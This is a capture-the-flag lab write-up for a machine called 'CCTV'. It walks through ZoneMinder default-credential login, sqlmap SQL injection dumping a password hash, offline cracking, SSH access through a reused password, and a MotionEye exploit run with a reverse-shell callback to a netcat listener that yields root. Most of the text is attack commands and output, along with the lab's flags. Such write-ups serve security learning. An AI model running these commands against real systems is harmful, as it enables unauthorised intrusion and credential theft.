CCTV

NMAP

nmap -sC -sV -T4 -p- 10.129.188.61

22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA)
80/tcp open  http    Apache httpd 2.4.58
|_http-title: Did not follow redirect to http://cctv.htb/
Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel

sudo nmap -A -sU --top-port 100 10.129.188.61

68/udp open|filtered dhcpc

HTTP (80)

  • Login page
  • Default credentials admin:admin are accepted (the default admin password was never changed)
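  • Instance of ZoneMinder version 1.37.63
  • Vulnerable to CVE-2024-51428 (verify the ID against the ZoneMinder advisory): SQL injection in the tid parameter of the removetag event request, reachable with any authenticated session; the fix is to upgrade to a patched release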
sqlmap -u "http://10.129.188.61/zm/index.php?view=request&request=event&action=removetag&tid=1" \
    --cookie="ZMSESSID=bqj0kajl2qb613gaa0tqs4a7qc" \
    -p tid --dbms=mysql --batch --dbs
    
available databases [3]:
[*] information_schema
[*] performance_schema
[*] zm


sqlmap -u "http://10.129.188.61/zm/index.php?view=request&request=event&action=removetag&tid=1"     --cookie="ZMSESSID=ukutcmjmofq9llm1bo4mpekk44"     -p tid --dbms=mysql --batch -D zm -T Users -C "Username" --dump


+------------+
| Username   |
+------------+
| admin      |
| mark       |
| superadmin |
+------------+


sqlmap -u "http://10.129.188.61/zm/index.php?view=request&request=event&action=removetag&tid=1"     --cookie="ZMSESSID=ukutcmjmofq9llm1bo4mpekk44"     -p tid --dbms=mysql --batch -D zm -T Users -C "Password" --where="Username='mark'" --dump

mark:$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG
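  • Crack the hash offline (the $2y$10$ prefix marks bcrypt at cost 10; it only falls to a wordlist because the password is a common one)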
echo '$2y$10$prZGnazejKcuTv5bKNexXOgLyQaok0hq07LW7AJ/QNqZolbXKfFG' > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt

Shell as Mark

ssh mark@10.129.188.61
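Password: opensesame (the password cracked from the web application's Users table is reused for mark's SSH login)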
  • Transfer LinPeas
scp linpeas.sh mark@10.129.188.61:/tmp 
tcp        0      0 127.0.0.1:8765          0.0.0.0:*               LISTEN      -
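  • MotionEye version 4.7.1 is running, bound to 127.0.0.1:8765 only (loopback binding keeps it off the network but does not protect it from a local user with SSH access)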
  • Port Forward to local machine
ssh -L 8765:127.0.0.1:8765 mark@10.129.188.61
  • Access via 127.0.0.1:8765
  • Checking MotionEye Config
find / -type f -name "*motioneye.conf"

/etc/motioneye/motioneye.conf
mark@cctv:/etc/motioneye$ ls -la
total 28
drwxr-xr-x   2 motion motion  4096 Nov  7 23:40 .
drwxr-xr-x 141 root   root   12288 Mar  2 10:05 ..
-rw-r--r--   1 motion motion  2287 Nov  8 01:16 camera-1.conf
-rw-r--r--   1 motion motion   278 Nov  8 01:16 motion.conf
-rw-r--r--   1 motion motion  3012 Nov  7 22:46 motioneye.conf
mark@cctv:/etc/motioneye$ cat motion.conf
# @admin_username admin
# @normal_username user
# @admin_password 989c5a8ee87a0e9521ec81a79187d162109282f0
# @lang en
# @enabled on
# @normal_password
setup_mode off
webcontrol_port 7999
webcontrol_interface 1
webcontrol_localhost on
webcontrol_parms 2
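  • Credentials for MotionEye admin:989c5a8ee87a0e9521ec81a79187d162109282f0 (the stored @admin_password value; motion.conf is world-readable, -rw-r--r--, so any local user can read it; restricting the file to the motion user would close this)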
  • Find Exploit for MotionEye CVE-2025-60787
python3 exploit.py -t http://127.0.0.1:8765 -p 989c5a8ee87a0e9521ec81a79187d162109282f0 -lh 10.10.14.63 -lp 4444

rlwrap nc -nvlp 4444

Shell as Root

cat user.txt
3ec3c2d8f16db502f6e91f33e28f91c0
cat root.txt
c561934fad992a87b1ab6f86eb02792f